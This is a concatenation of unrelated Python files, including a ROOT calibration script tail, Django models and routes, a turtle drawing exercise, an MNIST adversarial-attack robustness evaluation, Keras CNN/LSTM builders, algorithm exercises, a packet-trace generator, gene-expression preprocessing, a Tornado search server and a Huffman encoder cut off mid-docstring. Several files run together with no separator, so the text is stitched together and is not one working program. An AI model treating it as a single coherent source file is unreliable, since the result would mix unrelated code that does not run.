        if ev.trigger not in [1,2]: continue
        # NOTE(review): two-arg Fill -> entry weighted by cl.E/eg; confirm intended
        henergy[cl.mid].Fill(cl.E,cl.E/eg)
        hratio[cl.mid].Fill(cl.E/eg)
        hx[cl.mid].Fill(cl.x-xtrans)
        hy[cl.mid].Fill(cl.y-ytrans)
    var['n_cl'][0] = n_cl
    tree.Fill()
# writing gains: new gain = old gain / average(E_cluster/E_gamma); modules
# without statistics keep their previous gain
gains1 = [z/(x/y) if y!=0 else z for x,y,z in zip(lgain,ln,gains0)]
writelist(output+'_'+run+'.txt',[module_names,gains1,ln],tr=True)

# writing trees and histograms (one ROOT subdirectory per module)
fout.cd()
tree.Write()
for i in range(1728):
    folder = fout.mkdir(module_names[i])
    folder.cd()
    henergy[i].Write()
    hratio[i].Write()
    hx[i].Write()
    hy[i].Write()
    for j in range(6): htrigger[j][i].Write()
fout.Close()
sys.exit(0)
|
from django.db import models
from apex_api.models import User
class UserAmount(models.Model):
    """Current account balance belonging to a user."""
    # owning user; balances are deleted together with the user
    user = models.ForeignKey(to=User, on_delete=models.CASCADE)
    # default is the string "0"; Django coerces it to Decimal("0.00")
    balance = models.DecimalField(max_digits=19, default="0", decimal_places=2)

    def __str__(self):
        return f"Hello {self.user} this is your balance {self.balance}"
class Profit(models.Model):
    """Profit earned by a user at a given percentage rate."""
    user = models.ForeignKey(to=User, on_delete=models.CASCADE)
    # NOTE(review): both stored as free-text CharFields; DecimalField would
    # allow arithmetic/validation -- confirm before changing the schema.
    percentage_profit_rate = models.CharField(max_length=12)
    profit = models.CharField(max_length=100)

    def __str__(self):
        return f"{self.user} your profit is {self.profit} at the rate of {self.percentage_profit_rate}"
|
# Dan Schellenberg
# Drawing a square of any size
# Note that this program is inefficient. We haven't explored for/while loops yet.
import turtle
the_window = turtle.Screen()

# Collect the drawing parameters from the user via pop-up dialogs.
the_background = the_window.textinput("Background Color", "Please enter the background color")
the_window.bgcolor(the_background)

sarah = turtle.Turtle()
turtle_color = the_window.textinput("Turtle Color", "Please enter the color of the turtle")
sarah.color(turtle_color)

pen_width = the_window.numinput("Width", "Please enter the width of the pen")
sarah.pensize(pen_width)

length_of_sides = the_window.numinput("Length", "Please enter the length of each side")

#draw a square!
# (four explicit side/turn pairs on purpose -- loops come later in the course)
sarah.forward(length_of_sides)
sarah.left(90)
sarah.forward(length_of_sides)
sarah.left(90)
sarah.forward(length_of_sides)
sarah.left(90)
sarah.forward(length_of_sides)
sarah.left(90)

sarah.hideturtle()
# Imports
import torch
from torch.autograd import Variable
from models.classes.adjustable_lenet import AdjLeNet
from models.classes.first_layer_unitary_lenet import FstLayUniLeNet
from data_setup import Data
from academy import Academy
from adversarial_attacks import Attacker
import torchvision.transforms.functional as F
import operator
import numpy as np
from prettytable import PrettyTable
# Hyperparameters
gpu = True
save_to_excel = True
set_name = "MNIST"

# Declare which GPU PCI number to use
if gpu == True:
    import os
    os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
    os.environ["CUDA_VISIBLE_DEVICES"] = "1"

# Initialize table
table = PrettyTable()

# Initialize data
data = Data(gpu, set_name)

# Load LeNet with pretrained MNIST weights (98% accuracy checkpoint)
lenet = AdjLeNet(set_name = set_name)
lenet.load_state_dict(torch.load('models/pretrained/classic_lenet_w_acc_98.pt', map_location=torch.device('cpu')))
lenet.eval()

# Generate U: a random orthogonal 784x784 matrix (28*28 flattened MNIST)
U = torch.nn.init.orthogonal_(torch.empty(784, 784))

# Push to GPU if True
U = U if gpu == False else U.cuda()

# Enter student network and curriculum data into an academy
academy = Academy(lenet, data, gpu)

# Get model accuracy (clean test accuracy, baseline for fool ratios)
test_acc = academy.test()

# Create Attacker
attacker = Attacker(net = lenet,
                    data = data,
                    gpu = gpu)

# Declare epsilons: attack strengths 0.0 .. 16.0 in steps of 0.2
epsilons = [x/5 for x in range(81)]
table.add_column("Epsilons", epsilons)

# Get attack accuracies; fool ratio = accuracy drop relative to test_acc
print("Working on OSSA Attacks...")
ossa_accs = attacker.get_OSSA_attack_accuracy(epsilons = epsilons,
                                              U = None)
ossa_fool_ratio = attacker.get_fool_ratio(test_acc, ossa_accs)
table.add_column("OSSA Attack Accuracy", ossa_fool_ratio)

# Same attack but with the noise rotated by the orthogonal matrix U
print("Working on U(eta) Attacks...")
U_eta_accs = attacker.get_OSSA_attack_accuracy(epsilons = epsilons,
                                               U = U)
U_eta_fool_ratio = attacker.get_fool_ratio(test_acc, U_eta_accs)
table.add_column("OSSA (Ueta) Attack Accuracy", U_eta_fool_ratio)

print("Working on FGSM Attacks...")
fgsm_accs = attacker.get_FGSM_attack_accuracy(epsilons = epsilons)
fgsm_fool_ratio = attacker.get_fool_ratio(test_acc, fgsm_accs)
table.add_column("FGSM Attack Accuracy", fgsm_fool_ratio)

# Display
print(table)

# Excel Workbook Object is created
if save_to_excel:
    import xlwt
    from xlwt import Workbook

    # Open Workbook
    wb = Workbook()

    # Create sheet
    sheet = wb.add_sheet('Results')

    # Write out each peak and data: one column per result series
    results = [epsilons, ossa_fool_ratio, U_eta_fool_ratio, fgsm_fool_ratio]
    names = ["epsilons", "ossa_fool_ratio", "U_eta_fool_ratio", "fgsm_fool_ratio"]
    for i, result in enumerate(results):
        sheet.write(0, i, names[i])   # header row
        for j, value in enumerate(result):
            sheet.write(j + 1, i, value)
    wb.save('results.xls')
|
from skimage.feature import daisy
from skimage import data
import matplotlib.pyplot as plt
import csv
import imquality.brisque as brisque
import PIL.Image
import os
from os.path import expanduser
import numpy as np
import sys
from skimage.transform import rescale, resize, downscale_local_mean
from blob_detection import blobdetection
from orb import orb
# Print ORB feature counts for the first few clear vs. blurry training images.
home = expanduser("~")
clear_dir = home + "/Downloads/QA-Polyp/train/0-clear/"   # fixed: stray trailing semicolon removed
blur_dir = home + "/Downloads/QA-Polyp/train/1-blurry/"

clear_images = os.listdir(clear_dir)
blur_images = os.listdir(blur_dir)

LOOP = 4  # number of image pairs to sample
for i in range(LOOP):
    try:
        path = clear_dir+clear_images[i]
        #print(path+" Features :"+str(blobdetection(path)))
        print(path+" Features :"+str(orb(path)))
        path = blur_dir+blur_images[i]
        #print(path + " Features :" + str(blobdetection(path)))
        print(path+" Features :"+str(orb(path)))
    except Exception:
        # fixed: a bare `except:` also swallowed KeyboardInterrupt/SystemExit;
        # catch only real errors and report them
        print("error occurred :", sys.exc_info()[1])
|
from dynamic_rest.viewsets import DynamicModelViewSet
from .models import Parent, Child
from .serializers import ParentSerializer, ChildSerializer
class ChildViewSet(DynamicModelViewSet):
    """CRUD endpoint for Child records (dynamic-rest)."""
    # NOTE(review): bare manager rather than .objects.all() -- dynamic_rest
    # appears to accept this, but confirm against its documentation.
    queryset = Child.objects
    serializer_class = ChildSerializer
class ParentViewSet(DynamicModelViewSet):
    """CRUD endpoint for Parent records (dynamic-rest)."""
    # NOTE(review): bare manager rather than .objects.all(); see ChildViewSet.
    queryset = Parent.objects
    serializer_class = ParentSerializer
|
def solution(h):
    """For each tower height in `h`, return the 1-based index of the nearest
    strictly taller tower to its left, or 0 when none exists.

    Fixes over the original: O(n) monotonic stack instead of the O(n^2)
    pop(0)-and-scan, and the caller's list is no longer mutated (the old
    version reversed and emptied `h` as a side effect).
    """
    answer = []
    stack = []  # (1-based index, height), decreasing heights from bottom to top
    for idx, height in enumerate(h, start=1):
        # drop towers that are not strictly taller than the current one
        while stack and stack[-1][1] <= height:
            stack.pop()
        answer.append(stack[-1][0] if stack else 0)
        stack.append((idx, height))
    return answer
import tensorflow as tf
import utility
@utility.multi_input_model
@utility.named_model
def cnn_multi_input_v2_basic():
    """Five-branch 1D CNN: each branch convolves one (20, 1) series; the
    flattened branch outputs are concatenated into a Dense head ending in a
    single tanh unit. Compiled with Adam / MAE."""
    def build_branch():
        # one branch: two Conv1D+MaxPool stages over a (20, 1) series
        branch_input = tf.keras.layers.Input(shape=(20, 1))
        x = tf.keras.layers.Convolution1D(8, 3, activation="relu")(branch_input)
        x = tf.keras.layers.MaxPooling1D(2)(x)
        x = tf.keras.layers.Convolution1D(16, 3, activation="relu")(x)
        x = tf.keras.layers.MaxPooling1D(2)(x)
        return branch_input, tf.keras.layers.Flatten()(x)

    branch_inputs = []
    branch_outputs = []
    for _ in range(5):
        branch_input, branch_output = build_branch()
        branch_inputs.append(branch_input)
        branch_outputs.append(branch_output)

    merged = tf.concat(branch_outputs, axis=1)
    merged = tf.keras.layers.Dropout(0.5)(merged)
    merged = tf.keras.layers.Dense(32, activation="relu")(merged)
    merged = tf.keras.layers.Dense(8, activation="relu")(merged)
    prediction = tf.keras.layers.Dense(1, activation="tanh")(merged)

    model = tf.keras.Model(inputs=branch_inputs, outputs=prediction)
    model.compile(optimizer='Adam',
                  loss='mae',
                  metrics=['mae', 'mse'])
    return model
@utility.multi_input_model
@utility.named_model
def cnn_multi_input_v2_deep():
    """Five-branch deep 1D CNN over (20, 1) series; flattened branch outputs
    are concatenated into a Dense head with one tanh unit (Adam / MAE)."""
    def get_submodel():
        # One branch: five (Conv1D -> BatchNorm -> LeakyReLU) stages, then flatten.
        # NOTE(review): BatchNormalization(axis=1) normalises along the time
        # axis; for channels-last Conv1D output the usual choice is axis=-1 --
        # confirm this is intentional.
        input_ts = tf.keras.layers.Input(shape=(20, 1))
        temp1 = tf.keras.layers.Convolution1D(8, 3)(input_ts)
        temp1 = tf.keras.layers.BatchNormalization(axis=1)(temp1)
        temp1 = tf.keras.layers.LeakyReLU()(temp1)
        temp1 = tf.keras.layers.Convolution1D(8, 3)(temp1)
        temp1 = tf.keras.layers.BatchNormalization(axis=1)(temp1)
        temp1 = tf.keras.layers.LeakyReLU()(temp1)
        temp1 = tf.keras.layers.Convolution1D(8, 3)(temp1)
        temp1 = tf.keras.layers.BatchNormalization(axis=1)(temp1)
        temp1 = tf.keras.layers.LeakyReLU()(temp1)
        temp1 = tf.keras.layers.Convolution1D(8, 3)(temp1)
        temp1 = tf.keras.layers.BatchNormalization(axis=1)(temp1)
        temp1 = tf.keras.layers.LeakyReLU()(temp1)
        temp1 = tf.keras.layers.Convolution1D(8, 3)(temp1)
        temp1 = tf.keras.layers.BatchNormalization(axis=1)(temp1)
        temp1 = tf.keras.layers.LeakyReLU()(temp1)
        output_ts = tf.keras.layers.Flatten()(temp1)
        return input_ts, output_ts
    inp_list = []
    opt_list = []
    for _ in range(5):
        inp, opt = get_submodel()
        inp_list.append(inp)
        opt_list.append(opt)
    temp2 = tf.concat(opt_list, axis=1)
    temp2 = tf.keras.layers.Dense(32, activation="relu")(temp2)
    temp2 = tf.keras.layers.Dropout(0.5)(temp2)
    temp2 = tf.keras.layers.Dense(8, activation="relu")(temp2)
    output_final = tf.keras.layers.Dense(1, activation="tanh")(temp2)
    model = tf.keras.Model(inputs=inp_list, outputs=output_final)
    model.compile(optimizer='Adam',
                  loss='mae',
                  metrics=['mae', 'mse'])
    return model
@utility.multi_input_model
@utility.named_model
def lstm_multi_input_v2_basic():
    """Five-branch model: one small LSTM per (20, 1) input series; encoded
    branches are concatenated into a Dense head ending in a single tanh
    unit. Compiled with Adam / MAE."""
    def build_branch():
        series_in = tf.keras.layers.Input(shape=(20, 1))
        encoded = tf.keras.layers.LSTM(5, input_shape=(20, 1))(series_in)
        return series_in, tf.keras.layers.Flatten()(encoded)

    branch_inputs = []
    branch_outputs = []
    for _ in range(5):
        series_in, encoded = build_branch()
        branch_inputs.append(series_in)
        branch_outputs.append(encoded)

    merged = tf.concat(branch_outputs, axis=1)
    merged = tf.keras.layers.Dense(16, activation="relu")(merged)
    prediction = tf.keras.layers.Dense(1, activation="tanh")(merged)

    model = tf.keras.Model(inputs=branch_inputs, outputs=prediction)
    model.compile(optimizer='Adam',
                  loss='mae',
                  metrics=['mae', 'mse'])
    return model
@utility.multi_input_model
@utility.named_model
def lstm_multi_input_v2_stack4():
    """Five-branch model with a 4-deep stacked LSTM per (20, 1) branch;
    encoded branches feed a Dense head with a single tanh output.
    Compiled with Adam / MAE."""
    def build_branch():
        series_in = tf.keras.layers.Input(shape=(20, 1))
        x = series_in
        # three sequence-to-sequence layers, then one sequence-to-vector layer
        for _ in range(3):
            x = tf.keras.layers.LSTM(5, input_shape=(20, 1), return_sequences=True)(x)
        x = tf.keras.layers.LSTM(5, input_shape=(20, 1))(x)
        return series_in, tf.keras.layers.Flatten()(x)

    branch_inputs = []
    branch_outputs = []
    for _ in range(5):
        series_in, encoded = build_branch()
        branch_inputs.append(series_in)
        branch_outputs.append(encoded)

    merged = tf.concat(branch_outputs, axis=1)
    merged = tf.keras.layers.Dense(16, activation="relu")(merged)
    prediction = tf.keras.layers.Dense(1, activation="tanh")(merged)

    model = tf.keras.Model(inputs=branch_inputs, outputs=prediction)
    model.compile(optimizer='Adam',
                  loss='mae',
                  metrics=['mae', 'mse'])
    return model
# Model builders exercised in the first evaluation round.
test_iteration1 = [cnn_multi_input_v2_basic,
                   cnn_multi_input_v2_deep,
                   lstm_multi_input_v2_basic,
                   lstm_multi_input_v2_stack4]
|
from django.urls import path
from . import views
urlpatterns= [
    path('', views.home, name='home'),
    path('settings/', views.SettingsView.as_view(), name='settings'),
    # skills CRUD
    path('skills/', views.SkillListview.as_view(), name='skill-list'),
    path('skills/create', views.SkillCreateView.as_view(), name='skill-create'),
    path('skills/update/<int:pk>', views.SkillUpdateView.as_view(), name='skill-update'),
    path('skills/delete/<int:pk>', views.SkillDeleteView.as_view(), name='skill-delete'),
    # interests CRUD
    path('interests/', views.InterestListview.as_view(), name='interest-list'),
    path('interests/create', views.InterestCreateView.as_view(), name='interest-create'),
    path('interests/update/<int:pk>', views.InterestUpdateView.as_view(), name='interest-update'),
    path('interests/delete/<int:pk>', views.InterestDeleteView.as_view(), name='interest-delete'),
    # educations CRUD
    path('educations/', views.EducationListview.as_view(), name='education-list'),
    path('educations/create', views.EducationCreateView.as_view(), name='education-create'),
    path('educations/update/<int:pk>', views.EducationUpdateView.as_view(), name='education-update'),
    path('educations/delete/<int:pk>', views.EducationDeleteView.as_view(), name='education-delete'),
    # badges CRUD
    path('badges/', views.BadgeListview.as_view(), name='badge-list'),
    path('badges/create', views.BadgeCreateView.as_view(), name='badge-create'),
    path('badges/update/<int:pk>', views.BadgeUpdateView.as_view(), name='badge-update'),
    path('badges/delete/<int:pk>', views.BadgeDeleteView.as_view(), name='badge-delete'),
    # catch-all public profile page -- must stay LAST or it shadows the routes above
    path('<slug:username>/', views.WebsiteView.as_view(), name='website'),
]
# Problem #58 [Medium]
# An sorted array of integers was rotated an unknown number of times.
#
# Given such an array, find the index of the element in the array in faster than linear time.
# If the element doesn't exist in the array, return null.
#
# For example, given the array [13, 18, 25, 2, 8, 10] and the element 8, return 4 (the index of 8 in the array).
#
# You can assume all the integers in the array are unique.
def find_index(array, element, start=0, end=None):
    """Binary search in a rotated sorted array of unique integers.

    Returns the index of `element` within array[start:end+1], or None when
    absent. At each step exactly one half of the interval is sorted; we
    check whether `element` lies inside that sorted half and narrow the
    interval accordingly. O(log n).
    """
    if end is None:
        end = len(array) - 1
    lo, hi = start, end
    while lo <= hi:
        mid = (lo + hi) // 2
        if array[mid] == element:
            return mid
        if array[lo] <= array[mid]:
            # left half is sorted
            if array[lo] <= element <= array[mid]:
                hi = mid - 1      # element can only be in the left half
            else:
                lo = mid + 1
        else:
            # right half is sorted
            if array[mid] <= element <= array[hi]:
                lo = mid + 1      # element can only be in the right half
            else:
                hi = mid - 1
    # interval exhausted: the element is not in the array
    return None
# Smoke tests: every present element is found at its index, absent ones give None.
array = [13, 18, 25, 2, 8, 10]
for index in range(len(array)):
    assert find_index(array, array[index]) == index
assert find_index(array, 15) is None
assert find_index(array, 22) is None
assert find_index(array, 5) is None
assert find_index(array, 11) is None
# The problem seemed easy: I knew I had to use binary search, comparing the first element with the middle to decide
# which part of the array to check. I tried for a long time, maybe around two hours, to write a recursive solution
# that kept extracting the subarray containing the element, but for some reason I couldn't get right which part of
# the array to choose. I went online and found this solution, which never slices out the subarray itself but instead
# passes the subarray's start and end indices.
|
#coding: utf-8
import random,sys,math
import logging
from config import *
__all__ = ['generate']
def exponential (mean):
    """Draw a sample from an exponential distribution with the given mean
    via inverse-transform sampling.

    Fix: random.random() returns values in [0.0, 1.0), so the original
    -mean*log(random.random()) could raise ValueError (log of zero) when
    random() returned exactly 0.0; sampling 1.0 - random.random() keeps
    the log argument in (0.0, 1.0].
    """
    return (-mean * math.log(1.0 - random.random()))
def getPacketSize (averagePacketSize):
    """Draw exponentially-distributed packet sizes until one falls inside
    [MIN_PACKET_SIZE, MAX_PACKET_SIZE] (bounds from config), and return it."""
    while True:
        candidate = int(exponential(averagePacketSize))
        if MIN_PACKET_SIZE <= candidate <= MAX_PACKET_SIZE:
            return candidate
def getArrivalTime(arrivalRate,averagePacketSize):
    # Draw an inter-arrival time whose mean is (bits per packet) / arrivalRate,
    # i.e. the time one average packet takes at the given rate (bits/s).
    # NOTE(review): under Python 2 this division truncates when both operands
    # are ints -- confirm which interpreter this module targets.
    return exponential(( averagePacketSize * 8)/arrivalRate)
def generate(filename,simulationTime, arrivalRate, averagePacketSize):
    """Write a packet trace to `filename`: one "<arrival-time> \t <size>" line
    per packet, with cumulative arrival times up to `simulationTime`.

    I/O errors are logged (with traceback) rather than propagated.
    """
    try:
        with open(filename,'w') as file_in:
            time = 0.0
            while time <= simulationTime:
                time += getArrivalTime(arrivalRate,averagePacketSize)
                packetSize = getPacketSize(averagePacketSize)
                file_in.write("%s \t %s\n" % (time,packetSize))
    except IOError as ioerr:
        logging.exception('File creation error: IOError: '+str(ioerr))
|
""""
作者:jx
日期:2018-11-1
版本:1
文件名:data_process.py
功能:对striatum、cortex、liver三个组织的数据分别进行预处理
"""
import os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.preprocessing import MinMaxScaler
def pre_select_gene(str_2m_df, str_6m_df, str_10m_df, N):
    """
    Pre-process the gene-expression data and pre-select genes:
    1. Drop genes whose expression is 0 in every sample
    2. Min-max-normalise the expression data
    3. Compute each gene's mean and variance over all samples, ranked descending
    4. Use the rank product to keep the top-ranked N genes for the next step
    :param str_2m_df: 2-month expression DataFrame (column 0 = gene name)
    :param str_6m_df: 6-month expression DataFrame
    :param str_10m_df: 10-month expression DataFrame
    :param N: number of genes to keep
    :return: pre_select_gename -- array of selected gene names
    """
    # ===== Step 1. Merge the three time points; drop genes all-zero across samples =====
    # NOTE(review): DataFrame.as_matrix() was removed in pandas 1.0;
    # modern pandas needs .to_numpy() instead.
    str_2m_Oridata_matrix = str_2m_df.as_matrix()
    str_6m_Oridata_matrix = str_6m_df.as_matrix()
    str_10m_Oridata_matrix = str_10m_df.as_matrix()
    gename = str_2m_Oridata_matrix[:, 0]
    str_2m_data_matrix = str_2m_Oridata_matrix[:, 1:]
    str_6m_data_matrix = str_6m_Oridata_matrix[:, 1:]
    str_10m_data_matrix = str_10m_Oridata_matrix[:, 1:]
    # stack the three time points side by side into one matrix
    gene_express_matrix = np.hstack((str_2m_data_matrix, str_6m_data_matrix))
    gene_express_matrix = np.hstack((gene_express_matrix, str_10m_data_matrix))
    # drop genes whose expression sums to 0 over all samples
    # (assumes non-negative expression values, so sum == 0 means all-zero)
    proc1_gene_express_list = []
    proc1_gename = []
    for i in range(len(gename)):
        if sum(gene_express_matrix[i,:]) != 0:
            proc1_gene_express_list.append(gene_express_matrix[i, :])
            proc1_gename.append(gename[i])
    print('Total gene number:', len(gename))
    print('The selected gene number after filtering out 0', len(proc1_gename))
    # ===== Step 2. Per-gene variance and mean over all samples, ranked descending =====
    proc2_gene_express_matrix = np.array(proc1_gene_express_list)
    proc_gene_express_var = []
    proc_gene_express_mean = []
    # min-max scale each column
    # NOTE(review): MinMaxScaler normalises per *column* (per sample) while the
    # statistics below are per *row* (per gene) -- confirm this is intended.
    scaler = MinMaxScaler()
    gene_express_scaled = scaler.fit_transform(proc2_gene_express_matrix)
    # variance and mean of each gene across the samples
    for i in range(len(proc1_gename)):
        proc_gene_express_var.append(gene_express_scaled[i, :].var())
        proc_gene_express_mean.append(gene_express_scaled[i, :].mean())
    # convert lists to arrays so they can be sorted
    proc2_var = np.array(proc_gene_express_var)
    proc2_mean = np.array(proc_gene_express_mean)
    # sort descending, recording the ordering indices
    #proc2_sort = abs(np.sort(-proc2_var))
    #proc2_mean = abs(np.sort(-proc2_mean))
    proc2_var_sort_index = np.argsort(-proc2_var)
    proc2_mean_sort_index = np.argsort(-proc2_mean)
    print(proc2_var_sort_index)
    print(proc2_mean_sort_index)
    # combined ranking ("rank product")
    # NOTE(review): argsort gives "index of the i-th largest", not the rank of
    # gene i; a textbook rank product needs ranks (argsort of argsort). Verify.
    Rank_Product = []
    for i in range(len(proc1_gename)):
        a = proc2_var_sort_index[i]
        b = proc2_mean_sort_index[i]
        c = a * b
        Rank_Product.append(c)
    Rank_Product_sort_index = np.argsort(Rank_Product)
    # Optional plots: variance/mean curves of the scaled expression data.
    #plt.figure(1)
    #plt.plot(proc_var_sort[500:])
    #plt.xlabel('Ranking')
    #plt.ylabel('Variance')
    #plt.title('Variances of scaled gene expression')
    #plt.grid(True)
    #plt.show()
    #plt.figure(2)
    #plt.plot(proc_mean_sort[500:])
    #plt.xlabel('Ranking')
    #plt.ylabel('Mean')
    #plt.title('Means of scaled gene expression')
    #plt.grid(True)
    #plt.show()
    # ===== Step 3. Keep the top-ranked genes =====
    # keep the N best-ranked genes and return their names
    proc1_gename = np.array(proc1_gename)
    proc2_gename = []
    for i in range(len(proc1_gename)):
        if Rank_Product_sort_index[i] < N:
            proc2_gename.append(proc1_gename[i])
    pre_select_gename = np.array(proc2_gename)
    return pre_select_gename
def union_gene_list(gene_list1, gene_list2):
    """Merge two gene lists without duplicates: genes unique to gene_list1
    come first, followed by all of gene_list2. Prints the merged length
    and returns the merged list."""
    merged = [gene for gene in gene_list1 if gene not in gene_list2]
    merged.extend(gene_list2)
    print('基因列表长度为:', len(merged))
    return merged
def overlap_gene(gene_list1, gene_list2):
    """Return the genes present in both lists (in gene_list1 order) and
    print how many overlap."""
    shared = []
    for gene in gene_list1:
        if gene in gene_list2:
            shared.append(gene)
    print('重合基因个数:', len(shared))
    return shared
def get_gene_express(gene_name, str_2m_df, str_6m_df, str_10m_df):
    """
    Extract the expression rows for the genes listed in gene_name.
    :param gene_name: iterable of gene names to extract
    :param str_2m_df, str_6m_df, str_10m_df: expression DataFrames (column 0 = gene name)
    :return: str_2m_select_gene_express, str_6m_select_gene_express, str_10m_select_gene_express
    """
    # NOTE(review): as_matrix() was removed in pandas 1.0 (.to_numpy() now).
    str_2m_matrix = str_2m_df.as_matrix()
    str_6m_matrix = str_6m_df.as_matrix()
    str_10m_matrix = str_10m_df.as_matrix()
    str_2m_select_gexpress = []
    str_6m_select_gexpress = []
    str_10m_select_gexpress = []
    # linear scan per gene; the three matrices are assumed row-aligned by gene,
    # since the 6m/10m rows are taken at the index matched in the 2m matrix
    for i in range(len(gene_name)):
        for j in range(len(str_2m_matrix)):
            if gene_name[i] == str_2m_matrix[j, 0]:
                str_2m_select_gexpress.append(str_2m_matrix[j, :])
                str_6m_select_gexpress.append(str_6m_matrix[j, :])
                str_10m_select_gexpress.append(str_10m_matrix[j, :])
                break
    return str_2m_select_gexpress, str_6m_select_gexpress, str_10m_select_gexpress
def main():
    """
    Entry point: pre-select striatum genes, merge them with the training-set
    genes, extract their expression at each time point and save CSV files.
    """
    # ===== Step 1. Load the data and pre-select genes per tissue =====
    # striatum tissue data, as DataFrames
    striatum_2m_df = pd.read_csv('./data/hdinhd/Striatum/striatum_2m_FPKM.csv')
    striatum_6m_df = pd.read_csv('./data/hdinhd/Striatum/striatum_6m_FPKM.csv')
    striatum_10m_df = pd.read_csv('./data/hdinhd/Striatum/striatum_10m_FPKM.csv')
    # preliminary gene pre-selection for the striatum data
    str_gename = pre_select_gene(striatum_2m_df, striatum_6m_df, striatum_10m_df, 5000)
    # ===== Step 2. Overlap with the training genes; add them to the merged list =====
    # disease-related ("hit") and unrelated ("nohit") training genes
    hit_gene_df = pd.read_csv('./data/trainhital.csv')
    hit_gene = hit_gene_df.as_matrix()   # NOTE(review): removed in pandas 1.0
    hit_gename = hit_gene[:, 0]
    nohit_gene_df = pd.read_csv('./data/trainnohital.csv')
    nohit_gene = nohit_gene_df.as_matrix()
    nohit_gename = nohit_gene[:, 0]
    # report overlap of the pre-selected genes with each training subset
    overlap_gene(str_gename, hit_gename)
    overlap_gene(str_gename, nohit_gename)
    train = union_gene_list(hit_gename, nohit_gename)
    final_gene_list = union_gene_list(str_gename, train)
    # ===== Step 3. Extract expression data for the final gene list =====
    str_2m_gene_express, str_6m_gene_express, str_10m_gene_express = get_gene_express(final_gene_list, striatum_2m_df, striatum_6m_df, striatum_10m_df)
    # ===== Step 4. Save the output files =====
    # convert arrays to pandas DataFrames
    final_gene_list_df = pd.DataFrame(data = final_gene_list)
    str_2m_gene_express_df = pd.DataFrame(data = str_2m_gene_express)
    str_6m_gene_express_df = pd.DataFrame(data = str_6m_gene_express)
    str_10m_gene_express_df = pd.DataFrame(data = str_10m_gene_express)
    # write the CSVs
    final_gene_list_df.to_csv('./output/pre_genename.csv')
    str_2m_gene_express_df.to_csv('./output/str_2m_gene_express.csv')
    str_6m_gene_express_df.to_csv('./output/str_6m_gene_express.csv')
    str_10m_gene_express_df.to_csv('./output/str_10m_gene_express.csv')

if __name__ == '__main__':
    main()
# encoding: utf-8
import argparse
import json
import os
import traceback
import tornado.ioloop
import tornado.web
import mrep.builder as builder
import mrep.morph as morph
import mrep.pattern as pattern
class Database(object):
    """In-memory corpus: every sentence is parsed into morphemes once at
    construction time so that queries only run pattern matching."""
    def __init__(self, sentences):
        # Parse eagerly with MeCab; each entry keeps the raw sentence and its
        # morpheme list side by side.
        parser = morph.MeCabParser()
        data = []
        for s in sentences:
            data.append({
                'original': s,
                'morphemes': parser.parse(s),
            })
        self.data = data
    def find(self, pat):
        """Return [{'original', 'result'}] entries for sentences matched by `pat`."""
        # NOTE(review): the pattern is encoded to UTF-8 bytes before parsing —
        # this looks like a Python 2 convention; confirm builder.parse expects bytes.
        matcher = builder.parse(pat.encode('utf-8'))
        results = []
        for datum in self.data:
            ms = datum['morphemes']
            result = pattern.find(ms, matcher)
            # Only sentences with at least one match are reported.
            if len(result) > 0:
                results.append({
                    'original': datum['original'],
                    'result': result
                })
        return results
class TopHandler(tornado.web.RequestHandler):
    """Serves the landing page: the search form with no results yet."""

    def initialize(self, db):
        # Tornado passes the routing-table kwargs here; keep the DB handle.
        self.db = db

    def get(self):
        """Render the search template in its empty initial state."""
        blank_page = {'results': None, 'pat': '', 'error': None, 'trace': None}
        self.render('find.html', **blank_page)
class FindHandler(tornado.web.RequestHandler):
    """Handles /find: runs the morpheme pattern search and renders results."""

    def initialize(self, db):
        # Routing-table kwargs; keep a reference to the sentence database.
        self.db = db

    def get(self):
        pat = self.get_argument('pat')
        try:
            found = self.db.find(pat)
            self.render('find.html', results=found, pat=pat, error=None)
        except Exception as exc:
            # Any failure (bad pattern, render error) falls back to the
            # error view with the traceback attached.
            self.render('find.html', results=None, pat=pat, error=exc,
                        trace=traceback.format_exc())
def run():
    """Parse CLI arguments, load the sentence corpus, and start the server."""
    parser = argparse.ArgumentParser(
        description='MREP server: morpheme regular expression printer')
    parser.add_argument('file', metavar='FILE',
                        help='data file')
    parser.add_argument('-p', '--port', type=int, required=False, default=8080,
                        help='port number')
    args = parser.parse_args()
    root = os.path.dirname(os.path.abspath(__file__))
    # The data file holds one sentence per line.
    sentences = []
    with open(args.file) as f:
        for line in f:
            sentences.append(line.strip())
    db = Database(sentences)
    prop = {'db': db}
    handlers = [
        (r'/', TopHandler, prop),
        (r'/find', FindHandler, prop)
    ]
    # static/ and template/ are resolved relative to this file's directory.
    application = tornado.web.Application(
        handlers,
        static_path=os.path.join(root, 'static'),
        template_path=os.path.join(root, 'template'),
        debug=True)
    application.listen(args.port)
    print('The server is running on port %d' % args.port)
    print('Type <Ctrl-C> to stop the server')
    # Blocks until the process is interrupted.
    tornado.ioloop.IOLoop.instance().start()
|
from util import merge_dict, ComparableMixin
import pandas as pd
import numpy as np
import queue
import math
import random
# Random Encoding
def create_encoding_random(unique_classes):
    """
    Assign a distinct random fixed-width binary code to every class.
    :param unique_classes: container with the unique classes
    :return: dict class -> code, dict code -> class, and the code length
             (the smallest width whose code space covers all classes)
    """
    n_classes = len(unique_classes)
    encoding_length = int(math.log(n_classes, 2))
    if 2 ** encoding_length != n_classes:
        encoding_length += 1

    dict_class_code = {}
    dict_code_class = {}
    for cls in unique_classes:
        # Draw random codes until an unused one is found.
        while True:
            candidate = ''.join(random.choices(['0', '1'], k=encoding_length))
            if candidate not in dict_code_class:
                break
        dict_class_code[cls] = candidate
        dict_code_class[candidate] = cls
    return dict_class_code, dict_code_class, encoding_length
# Basic BinaryNode Structure
class BinaryNode(ComparableMixin):
    """Basic binary-tree node; ordering is delegated to ComparableMixin via
    _cmpkey (subclasses must provide `value`)."""

    def __init__(self, left_node=None, right_node=None, level=0):
        self.left_node = left_node
        self.right_node = right_node
        self.level = level
        self.code = ''

    def assign_code(self, code):
        # Pad with one '0' per remaining level below this node.
        self.code = code + '0' * self.level

    def change_level(self, level):
        self.level = level

    def _cmpkey(self):
        return self.value
class HuffmanBinaryNode(BinaryNode):
    """A BinaryNode carrying the frequency/weight value used for heap ordering."""
    def __init__(self, value, left_node=None, right_node=None, level=0):
        BinaryNode.__init__(self, left_node, right_node, level)
        self.value = value  # frequency/weight; also the _cmpkey used for comparisons
def encode_classes(node, code, level, value_attr, unique_values):
    """
    Encode all the children nodes of the current node, builds two dictionaries that keep the encoding
    :param node: the node of the tree beginning with each to encode
    :param code: the code to be assigned to the node
